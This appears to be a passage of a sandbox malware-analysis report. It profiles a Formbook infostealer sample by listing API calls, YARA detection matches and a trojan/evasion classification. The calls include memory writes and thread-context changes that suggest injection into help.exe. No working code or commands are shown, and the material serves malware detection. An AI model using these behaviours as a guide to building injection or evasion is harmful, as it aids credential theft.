Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_0041A05A NtClose,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_0041A10A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00419F2D NtCreateFile,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C098F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C095D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C097A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C098A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C0B040 NtSuspendThread,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09820 NtEnumerateKey,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C099D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09950 NtQueueApcThread,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09A10 NtQuerySection,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C0A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09B00 NtSetValueKey,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C095F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09560 NtWriteFile,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C09520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A060 NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A05A NtClose,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041A10A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00419F2D NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03669520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0366AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A060 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A10A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321A05A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03219F2D NtCreateFile,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_73761A98
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF20A0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C928EC
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDB090
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C920A8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA830
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81002
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9E824
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE99BF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE4120
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BCF900
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84AEF
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C922AE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C7FA2B
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFEBB0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C803DA
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8DBD2
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C723E3
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFABD8
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEA309
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92B28
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BEAB40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD841F
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D466
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C925DD
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC0D20
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91D55
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92D07
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C92EF7
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE6E30
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8D616
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9DFCE
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C91FF1
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00401030
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E206
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041DA32
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D330
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041E46E
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D87
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402D90
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E40
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_0041D666
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00409E3C
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_1_00402FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364AB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E03DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036EDBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0365EBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036DFA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F22AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03644120
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0362F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036499BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FE824
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0364A830
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036E1002
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F28EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036520A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F20A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036FDFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03646E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED616
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F1D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03620D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F2D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036F25DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03652581
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_036ED466
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0363841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D330
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321DA32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E206
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E3C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321D666
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03209E40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03202D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0321E46E
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0362B150 appears 72 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 00BCB150 appears 133 times
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: String function: 0041BDB0 appears 38 times
          Source: SX365783909782021.exe, 00000000.00000003.208364508.0000000009C4F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.258899247.0000000000769000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs SX365783909782021.exe
          Source: SX365783909782021.exe, 00000002.00000002.259254145.0000000000E4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SX365783909782021.exe
          Source: SX365783909782021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.SX365783909782021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SX365783909782021.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SX365783909782021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@4/4
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_01
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile created: C:\Users\user\AppData\Local\Temp\nsaD9FC.tmp
          Source: SX365783909782021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SX365783909782021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: SX365783909782021.exeVirustotal: Detection: 31%
          Source: SX365783909782021.exeReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\SX365783909782021.exeFile read: C:\Users\user\Desktop\SX365783909782021.exe
          Source: unknownProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
          Source: C:\Users\user\Desktop\SX365783909782021.exeProcess created: C:\Users\user\Desktop\SX365783909782021.exe 'C:\Users\user\Desktop\SX365783909782021.exe'
